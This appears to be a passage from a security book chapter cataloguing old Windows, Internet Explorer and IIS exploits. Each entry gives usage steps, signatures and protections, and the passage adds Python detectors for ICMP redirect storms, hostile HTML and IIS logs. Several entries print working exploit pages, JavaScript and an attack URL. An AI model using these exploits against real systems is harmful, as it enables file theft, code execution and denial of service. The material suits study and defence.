
Winfreeze

This exploit is really a spoofing exploit; however, it shows that when an attacker uses some creativity and sends spoofed traffic to an unexpected system, it can cause problems.

Name: Winfreeze

Operating System: WINNT, Win9x

Protocols/Services: The exploit code is a small script that runs on a UNIX-based machine and uses ICMP redirect packets to crash a Windows system.

How the Exploit Works

The attacker initiates a storm of ICMP Redirect Host messages that look like they are coming from the router. This is accomplished by spoofing the internal IP address of the router. The victim’s Windows machine changes its routing table because of the redirect host messages it is receiving from the spoofed device. This causes the victim’s Windows machine to freeze and lose network functionality.

How to Use the Exploit

Winfreeze is the executable used. It is run from a command prompt and only requires the IP of the intended target.

Signature of the Attack

The easiest way to detect this exploit is to look for an ICMP packet flood destined for the IP address of the internal interface of the router.

How to Protect Against It

Configure the network devices to block spoofing attempts. This can be done by using anti-spoof filters, which are available on most routers.
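The signature and the countermeasure above can be checked against a packet capture. The following is an added example written for this chapter, not code from Hackers Beware or from the Winfreeze tool. It works over constructed packet records; the record field names (ts, iface, proto, type, src, dst, gateway) are an assumption about what a capture tool would export, and the addresses and thresholds are placeholders. It flags three things: a burst of ICMP Redirects (type 5) at one host, a redirect whose advertised gateway is off the LAN (a real router never advertises one), and the anti-spoof condition the text recommends filtering on, a packet carrying the router's internal address that arrives on the external interface.

```python
"""Spot an ICMP Redirect storm and spoofed router sources in packet records.

Added example, not code from Hackers Beware. The packet records are
constructed; field names are an assumption about a capture tool's export.
"""
from collections import defaultdict, deque
from ipaddress import ip_address, ip_network

ICMP_REDIRECT = 5  # ICMP type 5 = Redirect (code 1 = redirect for host)


def is_spoofed_router(pkt, router_ip, external_iface):
    """Anti-spoof rule: a packet carrying the router's internal address as
    its source must never arrive on the external (untrusted) interface."""
    return pkt["src"] == router_ip and pkt["iface"] == external_iface


def redirect_storms(packets, lan, window_s=1.0, threshold=20):
    """Return (storms, bad_gateway).

    storms: sorted (victim, peak count) pairs for hosts that received more
    than `threshold` ICMP Redirects inside any `window_s`-second window.
    bad_gateway: redirects whose advertised gateway is not on the LAN; a
    real router only ever redirects to an on-link gateway (RFC 1122)."""
    recent = defaultdict(deque)   # victim -> timestamps inside the window
    peak = {}
    bad_gateway = []
    for pkt in packets:
        if pkt["proto"] != "icmp" or pkt["type"] != ICMP_REDIRECT:
            continue
        if pkt.get("gateway") and ip_address(pkt["gateway"]) not in lan:
            bad_gateway.append(pkt)
        q = recent[pkt["dst"]]
        q.append(pkt["ts"])
        while q and pkt["ts"] - q[0] > window_s:
            q.popleft()
        if len(q) > threshold:
            peak[pkt["dst"]] = max(peak.get(pkt["dst"], 0), len(q))
    return sorted(peak.items()), bad_gateway


def analyze(packets, router_ip, lan_cidr, external_iface):
    """Summarise the three checks for one capture."""
    lan = ip_network(lan_cidr)
    storms, bad_gw = redirect_storms(packets, lan)
    spoofed = sum(1 for p in packets if is_spoofed_router(p, router_ip, external_iface))
    return {"storms": storms,
            "bad_gateway": [p["dst"] for p in bad_gw],
            "spoofed": spoofed}


def build_sample(router_ip="192.168.1.1", victim="192.168.1.50"):
    """Constructed capture: a 50-packet redirect storm spoofing the router and
    arriving from outside (eth0), then two redirects from the inside (eth1),
    one of them advertising an off-link gateway, and one unrelated TCP packet.
    Timestamps are seconds."""
    def redirect(ts, iface, dst, gateway):
        return {"ts": ts, "iface": iface, "proto": "icmp", "type": ICMP_REDIRECT,
                "code": 1, "src": router_ip, "dst": dst, "gateway": gateway}

    pkts = [redirect(i * 0.01, "eth0", victim, "192.168.1.77") for i in range(50)]
    pkts.append(redirect(5.0, "eth1", "192.168.1.60", "192.168.1.254"))
    pkts.append(redirect(6.0, "eth1", "192.168.1.60", "10.9.9.9"))  # off-link gateway
    pkts.append({"ts": 6.5, "iface": "eth1", "proto": "tcp", "type": None,
                 "src": "192.168.1.60", "dst": victim})
    return pkts


if __name__ == "__main__":
    print(analyze(build_sample(), "192.168.1.1", "192.168.1.0/24", "eth0"))
```

The storm check alone cannot distinguish a spoofed router from a real one, because the source address is the router's; the interface check can, which is why the anti-spoof filter belongs on the router rather than on the victim.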

Additional Information

Additional information and the source code can be found at:

www.antionline.com/cgi-bin/Antisearchlinks.cgi?ID=46325091&url= http://www.anticode.com

www.microsoft.com

Hackers Beware © New Riders Publishing

520

Microsoft Windows Media Player JavaScript URL Vulnerability

This exploit takes advantage of a vulnerability in Microsoft’s Windows Media Player ActiveX control.

Exploit Details

Name: Microsoft Windows Media Player JavaScript URL Vulnerability

Operating System: Windows NT, 2000, 9x

Protocols/Services: Microsoft Windows Media Player 7

How the Exploit Works

An attacker can execute a JavaScript URL from within the Windows Media Player ActiveX control, which is embedded in HTML. This JavaScript can be executed in arbitrary frames that are specified within the ActiveX control.

This allows an attacker to take over the frame’s document object model, which will bypass the security restrictions on the victim’s machine. This is accomplished by having the victim visit a special web page. An attacker exploiting this vulnerability has the ability to read files and execute arbitrary programs on the victim’s system.

How to Use the Exploit

The easiest way to run this exploit is to activate the given script through any web browser.

How to Protect Against It

This vulnerability requires that ActiveX and JavaScript are enabled on the victim’s machine. Adjusting the security settings in Microsoft’s Internet Explorer can stop it. If ActiveX and Active Scripting options are set to Disabled, this vulnerability will be prevented.

Source Code/Pseudo Code

The following is the code used to launch this exploit:

<object id="o1" classid="clsid:6BF52A52-394A-11D3-B153-00C04F79FAA6">
<PARAM NAME="defaultFrame" value="georgi">
</object>
<SCRIPT>
alert("This page reads C:\\test.txt");
window.open("file://c:/test.txt","georgi");
function f()
{
document.o1.object.launchURL("javascript:alert(document.body.innerText)");
}
setTimeout("f()",1000);
</SCRIPT>

Additional Information

Additional information and the source code can be found at www.securityfocus.com

Microsoft Internet Explorer Mstask.exe CPU Consumption Vulnerability

By default, the program mstask.exe listens to ports between 1025 and 1220. A local or remote user can cause a CPU utilization Denial of Service attack if malformed arguments are sent to the mstask.exe service. By default, mstask.exe enables connections through the local host only. A restart of the infected system is required to gain normal functionality.

Exploit Detail

Name: Microsoft Internet Explorer ‘mstask.exe’ CPU Consumption Vulnerability

Operating System: Windows NT, 2000, 9x

Protocols/Services: Task scheduler engine (mstask.exe). IE 5.0 and 5.1

How the Exploit Works

MSTask.exe, which usually listens on port TCP 1026, causes memory to be used if it is connected and random characters are sent to it. After this connection, the machine would eventually freeze. The only solution is to reboot. MSTask.exe only permits connections through the local host. Due to this fact, most systems would have to originate the attack from the console. A user connecting to the victim’s machine through Terminal Server would have the same ability to exploit this vulnerability. If Wingate or Winproxy are installed on the victim’s system, the system becomes vulnerable for remote attackers because they can connect to the system’s 1026 TCP port through Wingate or Winproxy.

How to Use the Exploit

The following are the steps an attacker would take to run this exploit:

1. Start telnet.exe.
2. Menu->Connect->Remote System=127.0.0.1, Port=1026
3. Press the ‘Connect’ button.
4. When it connects, type some random characters and press Enter.
5. Close telnet.exe.

Signature of the Attack

The main signature of this attack is high CPU utilization that persists until a reboot is performed.

How to Protect Against It

There are currently no available patches to fix this vulnerability. Through implementing a policy of principle of least privilege and defense in depth, the impact can be minimized.

Source Code/Pseudo Code

Because this exploit is trivial to run, there is no source code required. If someone wanted to, it would be easy to write a Perl script to automate the steps.

Additional Information

Additional information and the source code can be found at www.securityfocus.com

Microsoft MSHTML.DLL Crash Vulnerability

This vulnerability involves how Javascript handles multiple window objects. If a window object is deleted after it receives data, and then it is re-initialized, the library will crash.

Exploit Details

Name: Microsoft MSHTML.DLL Crash Vulnerability

Operating System: Microsoft Windows 98se, Microsoft Windows 98, Microsoft Windows 95, Microsoft Windows NT 4.0, and Microsoft Windows NT 2000

Protocols/Services: Microsoft Internet Explorer 4.0 for Windows NT 4.0, Microsoft Internet Explorer 4.0 for Windows 98, Microsoft Internet Explorer 4.0 for Windows 95, Microsoft Internet Explorer 4.0 for Windows 3.1, Microsoft Outlook 2000, Microsoft Outlook Express 5.5, Microsoft Internet Explorer 5.5, Microsoft Internet Explorer 5.0.1 for Windows NT 4.0, Microsoft Internet Explorer 5.0.1 for Windows 98, Microsoft Internet Explorer 5.0.1 for Windows 95, Microsoft Internet Explorer 5.0.1 for Windows 2000, and Microsoft Internet Explorer 5.01


How the Exploit Works

The exploit works by deleting a window object after it has received data from the attacker’s machine.

How to Use the Exploit

A malicious user programs a web page to attack the end user when the user opens the page.

Signature of the Attack

A web site that, when viewed, causes the local machine to freeze.

How to Protect Against It

Currently, as of Spring 2001, there are no known patches to fix this exploit. Microsoft has acknowledged this and states that it will release a patch in the next service pack.

Source Code/Pseudo Code

The following is the source code for this exploit:

<iframe id=test style="display:none"></iframe>
<script>
Larholm = {}; // Object literal
test.document.open(); // Stream data
test.document.write("<s"+"cript>top.Larholm.test=0</s"+"cript>");
delete Larholm;
Larholm = {}; // Crash
</script>

An attacker would setup a web page and embed this code to exploit a victim.

Additional Information

Additional information and source code can be found at: www.securityfocus.com.

2001 IIS 5.0 Allows File Viewing

This script allows remote users to gain access to the content of /scripts/test.pl. This has the possibility of giving away passwords embedded in CGI scripts.

Exploit Details


Name: 2001 IIS 5.0 allows viewing files using %3F+.htr

Operating System: Windows 2000

Protocols/Services: IIS 5.0 and TCP/IP

Signature of the Attack

IIS 5.0 with the File Fragmenting patch installed.

How to Protect Against It

The best way to protect against this vulnerability is to uninstall the File Fragmenting patch for IIS 5.0 or to remove the vulnerable Perl script.

Source Code/Pseudo Code

If the target host is vulnerable, an attacker would just type the following URL into his browser to exploit the script: http://TARGETIIS/scripts/test.pl+.htr

Additional Information

The following is where the source code and additional information can be found:

www.securityfocus.com

www.microsoft.com

Media Player 7 and IE Java Vulnerability

There is a security vulnerability in the Windows Media Player 7 application that is exploitable through IE and Java. This exploit enables someone to read local files and browse local directories as well as execute arbitrary programs. This could lead to a remote user taking full control over the victim’s computer.

Exploit Details

Name: Media Player 7 and IE Java vulnerability

Operating System: Windows 95, 98, 98se, 2000, NT

Protocols/Services: IE Java, Windows Media Player 7

How the Exploit Works

Windows Media Player skins are installed in a commonly known directory with a commonly known name: “C:/Program files/Windows Media Player/Skins/SKIN.WMZ”.


The <IFRAME SRC="wmp2.wmz"></IFRAME> will download wmp2.wmz and place it in "C:/Program files/Windows Media Player/Skins/wmp2.wmz".

If wmp2.wmz is a java jar archive with the following applet tag,

--------------
<APPLET CODEBASE="file://c:/" ARCHIVE="Program files/Windows Media Player/SKINS/wmp2.wmz" CODE="gjavacodebase.class" WIDTH=700 HEIGHT=300>
<PARAM NAME="URL" VALUE="file:///c:/test.txt">
</APPLET>
---------------

it will be executed with codebase=file://c:/, and the applet will have read only access to C:\.

How to Use the Exploit

Any HTML editor can be used to make the hostile web site. Create a page with the given code. When a user links to that page, the vulnerability will be exploited.

Signature of the Attack

A sign of this exploit is when programs activate that the user did not intentionally start.

How to Protect Against It

The best way to protect against this attack is to disable Java, which is not always possible. As you can see with a lot of these new exploits, there is not a lot that can be done except to make sure all your systems and networking components implement a principle of least privilege and that you have defense in depth mechanisms in place protecting your corporate assets.

Source Code/Pseudo Code

The following is the source code that an attacker would put on a hostile web page and wait for a victim to connect:

--------wmp7-3.html-------------
<IFRAME SRC="wmp2.wmz" WIDTH=1 HEIGHT=1></IFRAME>
<SCRIPT>
function f()
{
window.open("wmp7-3a.html");
}
setTimeout("f()",4000);
</SCRIPT>
----------------------------------

------wmp7-3a.html----------
<APPLET CODEBASE="file://c:/" ARCHIVE="Program files/Windows Media Player/SKINS/wmp2.wmz" CODE="gjavacodebase.class" WIDTH=700 HEIGHT=300>
<PARAM NAME="URL" VALUE="file:///c:/test.txt">
</APPLET>
-----------------------------------

Additional Information

The following URL is where the source code and additional information can be found: http://www.netsecurity.org/text/bugs/979586134,83134,.shtml

IE 5.x/Outlook Allows Executing Arbitrary Programs

There is a security vulnerability in IE 5.x/Outlook/Outlook Express, which allows the execution of arbitrary programs using .chm files. This will reveal the location of the temporary Internet file folder on the victim’s machine. This can lead to an attacker taking full control over the victim’s computer.

Exploit Details

Name: IE 5.x/Outlook allows executing arbitrary programs using .chm files and the temporary Internet file folder.

Operating System: Windows 95, 98, 98se, NT, 2000

Protocols/Services: IE 5.x/Outlook/Outlook Express

How the Exploit Works

<OBJECT DATA="http://SOMEHOST.COM/chmtemp.html" TYPE="text/html" WIDTH=200 HEIGHT=200>

The object tag above may reveal one of the temporary Internet files folders through the document’s URL (where SOMEHOST.COM is a web server or alias that is different from the web server from which the HTML page is loaded). After a temporary Internet file folder name is known, it is possible to cache a .chm in any temporary Internet file folder and then use window.showHelp() to execute it.

Signature of the Attack


The only way to tell that this exploit has been used is if applications begin without the user activating them.

How to Protect Against It

This kind of attack can be avoided by setting the IE security on your machine to high.

Source Code/Pseudo Code

The following is the source code for running this exploit:

---------chmtempmain.html------------------------------------------
<IMG SRC="chm1.chm" WIDTH=1 HEIGHT=1>
<IMG SRC="chm2.chm" WIDTH=1 HEIGHT=1>
<IMG SRC="chm3.chm" WIDTH=1 HEIGHT=1>
<IMG SRC="chm4.chm" WIDTH=1 HEIGHT=1>
<IMG SRC="chm5.chm" WIDTH=1 HEIGHT=1>
<IMG SRC="chm6.chm" WIDTH=1 HEIGHT=1>
<IMG SRC="chm7.chm" WIDTH=1 HEIGHT=1>
<IMG SRC="chm8.chm" WIDTH=1 HEIGHT=1>
<IMG SRC="chm9.chm" WIDTH=1 HEIGHT=1>
<IMG SRC="chm10.chm" WIDTH=1 HEIGHT=1> <BR>
The object below must be loaded from a server with name different from the parent
document - it may be the same server but use the IP address or another alias.
<BR>
If this does not work try increasing the number of "chm*.chm" in IMG and showHelp.
<BR>
<OBJECT DATA="http://guninski.com/chmtemp.html" TYPE="text/html" WIDTH=200 HEIGHT=200>
---------------------------------------------------------------------

--------chmtemp.html-----------------------------------------------
<SCRIPT>
function g()
{
s=document.URL;
path=s.substr(0,s.lastIndexOf("\\"));
path=unescape(path);
alert("One of your temp files directory is: "+path);
window.showHelp(path+"\\chm1[1].chm");
window.showHelp(path+"\\chm2[1].chm");
window.showHelp(path+"\\chm3[1].chm");
window.showHelp(path+"\\chm4[1].chm");
window.showHelp(path+"\\chm5[1].chm");
window.showHelp(path+"\\chm6[1].chm");
window.showHelp(path+"\\chm7[1].chm");
window.showHelp(path+"\\chm8[1].chm");
window.showHelp(path+"\\chm9[1].chm");
window.showHelp(path+"\\chm10[1].chm");
}
setTimeout("g()",5000); // if you are on a slow internet connection you must increase the delay
</SCRIPT>
---------------------------------------------------------------------
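The three browser exploits in this chapter (the Media Player ActiveX launchURL page, the Media Player 7 Java skin page, and the .chm/showHelp page above) all have structural tells that a mail gateway or proxy content filter can look for before the page reaches a browser: the Media Player control classid combined with a javascript: launchURL, an applet whose CODEBASE is a file: URL, an IFRAME or IMG that pulls a .wmz or .chm, a remote text/html OBJECT, and a showHelp() call. The following scanner is an added example written for this chapter, not code from Hackers Beware or from the advisories it cites. The classid is the one in the listing above; the sample pages are constructed, stripped-down variants of the listings, and the finding labels are my own naming.

```python
"""Flag HTML that combines the building blocks of the chapter's browser exploits.

Added example, not code from Hackers Beware or the cited advisories. The sample
pages are constructed; the finding labels are this example's own naming.
"""
import re
from html.parser import HTMLParser

WMP_CLASSID = "6bf52a52-394a-11d3-b153-00c04f79faa6"  # Windows Media Player control (from the listing)


class _Collector(HTMLParser):
    """Collects start tags with their attributes and the text of <script> blocks."""

    def __init__(self):
        super().__init__()
        self.tags = []        # (tag, {attr: value}) in document order
        self.scripts = []     # bodies of <script> elements
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, {k: (v or "") for k, v in attrs}))
        if tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self.scripts.append(data)


def scan_html(html):
    """Return a sorted list of finding labels for one page (empty if clean)."""
    p = _Collector()
    p.feed(html)
    p.close()
    findings = set()
    for tag, a in p.tags:
        src = a.get("src", "").lower()
        if tag == "object" and WMP_CLASSID in a.get("classid", "").lower():
            findings.add("wmp-activex-control")
        if tag == "object" and a.get("type", "").lower() == "text/html" \
                and a.get("data", "").lower().startswith("http"):
            findings.add("object-embeds-remote-html")
        if tag == "applet" and a.get("codebase", "").lower().startswith("file:"):
            findings.add("applet-file-codebase")
        if tag in ("iframe", "img", "embed") and src.endswith((".wmz", ".chm")):
            findings.add(f"{tag}-loads-{src.rsplit('.', 1)[-1]}")
    script = "\n".join(p.scripts)
    if re.search(r"launchurl\s*\(\s*['\"]javascript:", script, re.I):
        findings.add("launchurl-javascript-url")
    if re.search(r"\bshowhelp\s*\(", script, re.I):
        findings.add("showhelp-call")
    return sorted(findings)


# Constructed, stripped-down samples in the shape of the chapter's listings.
SAMPLE_WMP = """<object id="o1" classid="clsid:6BF52A52-394A-11D3-B153-00C04F79FAA6">
<PARAM NAME="defaultFrame" value="x"></object>
<SCRIPT>function f(){document.o1.object.launchURL("javascript:alert(1)");}</SCRIPT>"""

SAMPLE_JAVA = """<IFRAME SRC="wmp2.wmz" WIDTH=1 HEIGHT=1></IFRAME>
<APPLET CODEBASE="file://c:/" ARCHIVE="Program files/Windows Media Player/SKINS/wmp2.wmz"
CODE="x.class"></APPLET>"""

SAMPLE_CHM = r"""<IMG SRC="chm1.chm" WIDTH=1 HEIGHT=1>
<OBJECT DATA="http://other.example/chmtemp.html" TYPE="text/html" WIDTH=200 HEIGHT=200></OBJECT>
<SCRIPT>path=unescape(document.URL); window.showHelp(path+"\\chm1[1].chm");</SCRIPT>"""

SAMPLE_BENIGN = "<html><body><p>hello</p><script>var x = 1;</script></body></html>"

if __name__ == "__main__":
    for name, page in [("wmp", SAMPLE_WMP), ("java", SAMPLE_JAVA),
                       ("chm", SAMPLE_CHM), ("benign", SAMPLE_BENIGN)]:
        print(name, scan_html(page))
```

A single finding is only a hint; the combinations are what matter (the control plus the javascript: launchURL, the file: codebase plus the .wmz download), and a filter should report the pair. The scanner is deliberately lenient about case and attribute quoting because all of the listings mix upper- and lower-case tags.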

Additional Information

Source code and additional information can be found at

http://www.guninski.com/

IIS 5.0 Allows Executing Arbitrary Commands on the Web Server

If patch Q277873 is installed on IIS 5.0, then a remote attacker can execute arbitrary programs on the web server.

Exploit Details

Name: IIS 5.0 with patch Q277873 allows executing arbitrary commands on the web server

Operating System: Any Microsoft Server Platform with IIS 5.0 and patch Q277873

Protocols/Services: IIS 5.0

How the Exploit Works

When IIS receives a valid request for an executable file, it passes the name of the requested file to the Windows operating system for processing. It is possible for an attacker to create a malformed file request that contains both a file name and one or more operating system commands. When the system receives this request, IIS passes the entire string to the operating system, which would then process the file and execute the commands.
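Both IIS 5.0 issues in this chapter (the earlier test.pl+.htr source disclosure and the command-passing problem described above) leave a distinctive trace in the W3C extended log that IIS writes, so they can be found after the fact even without a patch. The following log checker is an added example written for this chapter, not code from Hackers Beware or from Microsoft. The log lines are constructed and use documentation addresses; the field list follows the W3C extended format IIS uses, and the two detection rules are this example's own: a request whose decoded path ends in "+.htr", and a request for an executable whose path or arguments carry a shell metacharacter.

```python
"""Scan IIS W3C extended logs for the two request shapes discussed in the chapter.

Added example, not code from Hackers Beware or Microsoft. The sample log is
constructed; the field list follows the W3C extended log format.
"""
import re
from urllib.parse import unquote

DEFAULT_FIELDS = ["date", "time", "c-ip", "cs-method", "cs-uri-stem", "cs-uri-query", "sc-status"]
EXEC_EXT = (".pl", ".exe", ".bat", ".cmd", ".asp", ".dll", ".cgi")
SHELL_META = re.compile(r"[|&;`]")


def parse_iis_line(line, fields):
    """Return a dict for one data line, or None for directives, blanks and short lines."""
    if not line or line.startswith("#"):
        return None
    parts = line.split()
    if len(parts) != len(fields):
        return None
    rec = dict(zip(fields, parts))
    if rec.get("cs-uri-query") == "-":   # IIS logs an empty query as "-"
        rec["cs-uri-query"] = ""
    return rec


def classify(rec):
    """Return the list of rule labels a record trips."""
    stem = unquote(rec.get("cs-uri-stem", "")).lower()
    query = unquote(rec.get("cs-uri-query", "")).lower()
    target = stem + ("?" + query if query else "")
    findings = []
    # "+.htr" appended to a script name asks the .htr ISAPI filter to return the script source
    if target.endswith("+.htr"):
        findings.append("htr-source-disclosure")
    # executable target with a shell metacharacter somewhere in path or arguments
    if stem.endswith(EXEC_EXT) and SHELL_META.search(target):
        findings.append("exec-with-shell-metachars")
    return findings


def scan_log(lines):
    """Walk a log, honouring #Fields: directives, and return (client, stem, label) hits."""
    fields = list(DEFAULT_FIELDS)
    hits = []
    for line in lines:
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        rec = parse_iis_line(line, fields)
        if rec is None:
            continue
        for label in classify(rec):
            hits.append((rec["c-ip"], rec["cs-uri-stem"], label))
    return hits


# Constructed sample log (documentation addresses, made-up times).
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 5.0
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2001-03-10 10:01:02 192.0.2.10 GET /default.htm - 200
2001-03-10 10:01:05 192.0.2.10 GET /scripts/test.pl name=bob 200
2001-03-10 10:02:11 203.0.113.7 GET /scripts/test.pl+.htr - 200
2001-03-10 10:02:30 203.0.113.7 GET /scripts/test.pl %3F+.htr 200
2001-03-10 10:03:45 203.0.113.9 GET /scripts/lookup.exe id=1%7Cdir 500
""".splitlines()

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```

Decoding the URI before matching is the important step: the "%3F" form in the exploit name and the literal "+.htr" form are the same request to IIS, and a rule that only looks at the raw stem misses the encoded one.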

How to Use the Exploit

The only product needed to run the exploit is an Internet browser and the given script.